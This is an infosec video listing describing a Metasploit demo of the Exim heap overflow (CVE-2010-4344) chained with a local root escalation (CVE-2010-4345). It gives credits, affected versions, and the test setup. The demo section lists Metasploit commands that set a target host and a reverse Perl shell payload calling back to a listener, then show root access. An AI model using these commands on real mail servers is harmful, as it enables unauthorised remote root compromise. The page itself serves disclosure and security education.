Description: Timeline :
Vulnerability discovered the 2010-12-07 by Sergey Kononenko
Vulnerability confirmed the 2010-12-10 by David Woodhouse
Exploit released the 2010-12-10 by hdm & jduck
Vulnerability corrected the 2008-12-02 but neither identified as a vulnerability since 2 years ! So not ported in most OS distributions.
Provided by:
Sergey Kononenko
David Woodhouse
jduck (Metasploit Team)
hdm (Metasploit Team)
Reference(s) :
CVE-2010-4345
CVE-2010-4344
OSVDB-69685
Affected versions :
Version before and equal to 4.69, depending on the distrib versioning
Tested on Debian Lenny 5.0
With
exim4-base_4.69-9_i386.deb
exim4-config_4.69-9_all.deb
exim4-daemon-light_4.69-9_i386.deb
exim4_4.69-9_all.deb
http://mirror.ovh.net/debian/pool/main/e/exim4/
dpkg -l | grep exim4
Description:
This Metasploit module exploits a heap buffer overflow within versions of Exim prior to version 4.69. By sending a specially crafted message, an attacker can corrupt the heap and execute arbitrary code with the privileges of the Exim daemon (CVE-2010-4344). An additional vulnerability, CVE-2010-4345, was also used in the attack that led to the discovery of danger of this bug. This bug allows a local user to gain root privileges from the Exim user account. If the Perl interpreter is found on the remote system, this module will automatically exploit the secondary bug as well to get root.
Metasploit Demo :
dpkg -l | grep exim4
tail -f /var/log/exim4/mainlog
use exploit/unix/smtp/exim4_string_format
set RHOST 192.168.178.52
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit
id
owned
Tags: smtp , mail server , metasploit , 0day , exim , linux , unix ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.